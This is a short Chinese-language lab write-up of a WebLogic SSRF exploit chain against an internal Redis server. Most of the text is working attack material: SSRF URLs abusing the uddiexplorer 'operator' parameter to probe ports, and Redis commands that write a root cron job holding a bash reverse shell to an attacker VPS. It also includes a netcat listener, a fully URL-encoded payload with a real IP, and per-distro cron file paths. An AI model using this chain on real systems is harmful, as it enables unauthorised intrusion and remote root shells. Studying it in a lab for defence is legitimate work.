VPS:x.x.x.x
跳板机debian:192.168.130.129 weblogic
内网ubuntu:192.168.130.132 redis
1、operator参数可以调用外部url,由于未做限制,造成ssrf,可以借助它探测服务器端口,如下两种不同的报错
http://192.168.130.129:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001
http://192.168.130.129:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:3389
2、通过ssrf探测内网主机,发现内网主机192.168.130.132开启6379且存在redis未授权,可以通过http的get请求写入shell
为什么get请求能写shell
1、redis未授权
2、redis通过换行符(\r\n)来分隔命令
3、目标主机开启定时任务
3、VPS监听6666端口
root@iZbp1h497hkijddeblcm8jZ:~# nc -lvp 6666
Listening on [0.0.0.0] (family 0, port 6666)
4、get写定时任务 shell /etc/crontab
set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/VPS:ip/6666 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
命令之间用\r\n分隔,url编码%0D%0A,全部url编码
set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F47.97.50.242%2F6666%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A
5、传参,反弹shell
遇到的坑
1.定时任务不一定会执行
2.不同系统定时任务目录不一样
/etc/crontab #大部分linux
/etc/cron.d/ #ubuntu
/var/spool/cron/root #centOS
/var/spool/cron/crontabs/root #debian
3.不太理解README里的shell最后为啥要加个aaa